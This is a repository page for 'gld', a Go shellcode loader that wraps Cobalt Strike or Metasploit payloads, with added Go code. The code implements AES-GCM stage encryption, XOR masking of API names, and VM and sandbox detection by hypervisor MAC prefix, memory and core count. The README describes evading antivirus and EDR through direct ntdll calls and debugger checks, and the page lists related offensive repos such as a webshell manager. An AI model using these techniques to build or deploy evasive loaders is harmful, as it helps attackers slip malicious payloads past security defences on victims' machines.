• This repository has been archived on 30/Jan/2021
• Stars: 170
• Rank: 223,357 (Top 5 %)
• Language: Go
• License: Mozilla Public Li...
• Created over 4 years ago
• Updated almost 4 years ago


Repository Details

Go shellcode LoaDer

This repo is a demo and lacks the features needed to bypass AV/EDR. I have written a private framework with more evasion techniques; it may be made public in the future.

Usage

Generate shellcode with Cobalt Strike (CS) or Metasploit (MSF) first, then use gld to build the wrapped binary, passing the shellcode file and the target architecture (x64 or x86):

./gld shellcode.bin [x64/x86]

Tech

Loader

  • Shellcode is encrypted with AES-GCM at build time and decrypted into memory only at runtime, so the plaintext stage is never stored in the binary; because GCM is authenticated, a ciphertext that has been patched or truncated fails the tag check instead of being executed
  • Calls ntdll!ZwProtectVirtualMemory directly instead of kernelbase!VirtualProtect to make the decrypted buffer executable (DEP would otherwise block running it); going straight to the ntdll export sidesteps user-mode hooks placed on the higher-level kernel32/kernelbase wrapper. Caveat: security products commonly hook the Nt*/Zw* stubs in ntdll itself, which this does not avoid
  • Passes the procedure name as a local variable built from a byte slice (string([]byte{...})) rather than as a string literal, so the API name does not land in the binary's string table. Caveat: the Go compiler may still emit a constant byte-slice literal as one contiguous static array, so the plaintext bytes remain matchable; transforming the bytes (for example XOR with a per-build key) and undoing it at runtime avoids that
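
The two build/runtime halves of the loader section above (AES-GCM wrapping of the stage, and building an API name from masked bytes) as an added, portable Go example. This is not gld's own code: the Wrap/Unwrap/GoLiteral/MaskName names, the single-byte XOR mask and the three-byte sample stage are my own choices, and the Windows-specific steps that follow decryption (allocating the buffer, ZwProtectVirtualMemory, starting the thread) are deliberately left out so the example runs anywhere.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

// Wrapped is what the build step embeds in the output binary: the
// AES-256-GCM sealed stage together with the key and nonce needed to open it.
type Wrapped struct {
	Key        []byte // 32 bytes -> AES-256
	Nonce      []byte // 12 bytes, the standard GCM nonce size
	Ciphertext []byte // stage || 16-byte GCM authentication tag
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Wrap is the build-time step: seal raw shellcode under a fresh random key
// and nonce, so two wrapped builds of the same stage share no bytes.
func Wrap(shellcode []byte) (*Wrapped, error) {
	w := &Wrapped{Key: make([]byte, 32), Nonce: make([]byte, 12)}
	if _, err := rand.Read(w.Key); err != nil {
		return nil, err
	}
	if _, err := rand.Read(w.Nonce); err != nil {
		return nil, err
	}
	gcm, err := newGCM(w.Key)
	if err != nil {
		return nil, err
	}
	w.Ciphertext = gcm.Seal(nil, w.Nonce, shellcode, nil)
	return w, nil
}

// Unwrap is the runtime step: open the stage and verify its tag. Any change
// to the ciphertext fails authentication, so a corrupted stage is never run.
func Unwrap(w *Wrapped) ([]byte, error) {
	gcm, err := newGCM(w.Key)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, w.Nonce, w.Ciphertext, nil)
}

// GoLiteral renders a byte slice as Go source, the form in which a build
// step would paste key, nonce and ciphertext into a loader template.
func GoLiteral(name string, b []byte) string {
	var buf bytes.Buffer
	fmt.Fprintf(&buf, "var %s = []byte{", name)
	for i, c := range b {
		if i > 0 {
			buf.WriteString(", ")
		}
		fmt.Fprintf(&buf, "0x%02x", c)
	}
	buf.WriteString("}")
	return buf.String()
}

// MaskName XOR-encodes an API name with a one-byte key at build time. A bare
// string([]byte{...}) keeps the name out of the string table, but the Go
// compiler may still store the constant slice contiguously; masking means the
// plaintext name exists only in the stack/heap buffer built by UnmaskName.
func MaskName(name string, key byte) []byte {
	out := make([]byte, len(name))
	for i := 0; i < len(name); i++ {
		out[i] = name[i] ^ key
	}
	return out
}

// UnmaskName rebuilds the name at runtime, just before the export lookup.
func UnmaskName(enc []byte, key byte) string {
	out := make([]byte, len(enc))
	for i, c := range enc {
		out[i] = c ^ key
	}
	return string(out)
}

func main() {
	// Constructed sample stage (NOP, NOP, INT3); not real shellcode.
	stage := []byte{0x90, 0x90, 0xcc}
	w, err := Wrap(stage)
	if err != nil {
		panic(err)
	}
	fmt.Println(GoLiteral("key", w.Key))
	fmt.Println(GoLiteral("nonce", w.Nonce))
	fmt.Println(GoLiteral("stage", w.Ciphertext))

	got, err := Unwrap(w)
	fmt.Printf("round trip ok: %v\n", err == nil && bytes.Equal(got, stage))

	// Flip one ciphertext byte: GCM rejects it rather than returning garbage.
	w.Ciphertext[0] ^= 0x01
	_, err = Unwrap(w)
	fmt.Printf("tampered stage rejected: %v\n", err != nil)

	// Hypothetical masked export name, recovered only at call time.
	enc := MaskName("ZwProtectVirtualMemory", 0x5a)
	fmt.Println(UnmaskName(enc, 0x5a))
}
```

The key and nonce are embedded next to the ciphertext, so this protects against static signatures and tampering, not against an analyst who runs the binary or reads the key out of it; that is the same trade-off the README's design makes.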

Detector

  • VM
    • Check whether any network interface's MAC address starts with a blacklisted vendor prefix (OUI) assigned to a hypervisor vendor
    • Check whether physical memory is below 2 GB or the machine has fewer than 2 CPU cores (via cpuid and GlobalMemoryStatusEx), both typical of a sandbox VM
  • DBG
    • Enumerate running processes with CreateToolhelp32Snapshot and look for known debugger process names
    • Check whether the current process is being debugged by a user-mode debugger (IsDebuggerPresent)
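
The VM heuristics above, as an added Go example that is not gld's own code. The MAC check runs against the real interfaces via net.Interfaces; physical memory is passed in as a parameter because querying it is OS-specific (GlobalMemoryStatusEx on Windows), and the debugger checks (IsDebuggerPresent, Toolhelp) are Windows-only and not reproduced here. The OUI table is the usual public list of hypervisor vendor prefixes; the VMVendorForMAC/Assess/Verdict names and the sample addresses are my own.

```go
package main

import (
	"fmt"
	"net"
	"runtime"
)

// vmOUIs maps well-known IEEE OUI prefixes to the hypervisor vendor that
// uses them for virtual NICs. Keys are lower-case, colon separated.
var vmOUIs = map[string]string{
	"00:05:69": "VMware",
	"00:0c:29": "VMware",
	"00:1c:14": "VMware",
	"00:50:56": "VMware",
	"08:00:27": "VirtualBox",
	"00:15:5d": "Hyper-V",
	"00:1c:42": "Parallels",
	"00:16:3e": "Xen",
	"52:54:00": "QEMU/KVM",
}

// VMVendorForMAC returns the vendor whose OUI the address carries, or "".
func VMVendorForMAC(mac net.HardwareAddr) string {
	if len(mac) < 3 {
		return ""
	}
	prefix := fmt.Sprintf("%02x:%02x:%02x", mac[0], mac[1], mac[2])
	return vmOUIs[prefix]
}

// Verdict collects every indicator that fired, so the caller can log why.
type Verdict struct {
	Indicators []string
}

func (v Verdict) LooksLikeVM() bool { return len(v.Indicators) > 0 }

// Assess applies the three README heuristics: hypervisor OUI, less than
// 2 GiB of physical memory, fewer than 2 CPU cores. physMem is supplied by
// the caller (GlobalMemoryStatusEx on Windows, /proc/meminfo on Linux).
func Assess(macs []net.HardwareAddr, physMem uint64, cpus int) Verdict {
	var v Verdict
	for _, m := range macs {
		if vendor := VMVendorForMAC(m); vendor != "" {
			v.Indicators = append(v.Indicators, fmt.Sprintf("MAC %s has %s OUI", m, vendor))
		}
	}
	const twoGiB = 2 << 30
	if physMem < twoGiB {
		v.Indicators = append(v.Indicators, fmt.Sprintf("physical memory %d MiB < 2048", physMem>>20))
	}
	if cpus < 2 {
		v.Indicators = append(v.Indicators, fmt.Sprintf("only %d CPU core", cpus))
	}
	return v
}

// localMACs collects the hardware addresses of this host's interfaces.
func localMACs() []net.HardwareAddr {
	ifaces, err := net.Interfaces()
	if err != nil {
		return nil
	}
	var out []net.HardwareAddr
	for _, i := range ifaces {
		if len(i.HardwareAddr) >= 3 {
			out = append(out, i.HardwareAddr)
		}
	}
	return out
}

func main() {
	// Constructed sample: a VMware NIC on a 1 GiB, single-core guest.
	mac, _ := net.ParseMAC("00:0c:29:3e:4f:50")
	v := Assess([]net.HardwareAddr{mac}, 1<<30, 1)
	for _, s := range v.Indicators {
		fmt.Println("indicator:", s)
	}

	// Same checks against this host. Memory is not queried here (that part
	// is OS-specific), so a value above the threshold is passed and only the
	// MAC and core-count checks can fire.
	host := Assess(localMACs(), 4<<30, runtime.NumCPU())
	fmt.Println("host looks like a VM:", host.LooksLikeVM())
}
```

Note the false-positive surface: plenty of production servers are VMs with a VMware OUI and two cores, so a loader using only these checks will refuse to run on real targets as often as in sandboxes, which is why the README calls the project a demo.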

More Repositories

  • iox (Go, 998 stars): Tool for port forwarding & intranet proxy
  • win32api-practice (C++, 148 stars): Offensive tools written for practice purposes
  • pker (Python, 124 stars): Automatically converts Python source code to Pickle opcode
  • memexec (Rust, 122 stars): A library for loading and executing PE (Portable Executable) from memory without ever touching the disk
  • nic (Go, 103 stars): 🌀 Nic is an HTTP request client with an elegant and easy-to-use API
  • secure-cookie-faker (Go, 36 stars): Security tool to encode/decode the client-side session cookie of Golang web frameworks that use `gorilla/securecookie` or `gorilla/sessions`, such as Gin, Echo or Iris
  • lessons-robber (Python, 21 stars): Multi-threaded/coroutine script for grabbing CUMT elective courses
  • analog-login (Python, 14 stars): Simulated login to the CUMT academic affairs system
  • ntlmssp (Go, 11 stars): Windows NTLMSSP library
  • zip_crack (Python, 9 stars): Brute-force password cracking for zip archives
  • macho-ld (Rust, 6 stars): In-memory loading and executing of Mach-O files
  • ctf-hash-proof (Go, 6 stars): Fast CLI tool written for CTF players to solve hash proofs (md5, sha1, sha256, sha512)
  • tar-vuln-server (Go, 4 stars): HTTP server program that reproduces privilege escalation via the tar command's checkpoint-action parameter
  • nemesis (Python, 3 stars): CLI webshell manager
  • win64-syscall (Rust, 3 stars): Windows x64 indirect syscall lib for maldev with no_std support
  • async-socks5 (Rust, 3 stars)
  • EddieIvan01.github.io (SCSS, 3 stars)
  • flask-bbs (JavaScript, 2 stars): Simple BBS demo, written in Flask and Bootstrap
  • roarCTF-dist-casino (Python, 2 stars): roarCTF challenge dist source code and writeup
  • Generate_Char_By_Xor (Python, 2 stars): Webshell for CTF challenges that filter specified characters; generates the needed characters in PHP by XOR-ing other characters
  • Dir_Scanner_WithProxies (Python, 1 star): Scan websites' directories through proxies
  • Game (Visual Basic, 1 star): Small VB game, 生死狙击
  • x-csrf (Go, 1 star): Middleware to defend against CSRF attacks for the gin framework
  • ProxyPool (Go, 1 star): A simple proxy pool written in Golang
  • flag (1 star)
  • functional-programming (Scheme, 1 star): Some basic data structures written in Scheme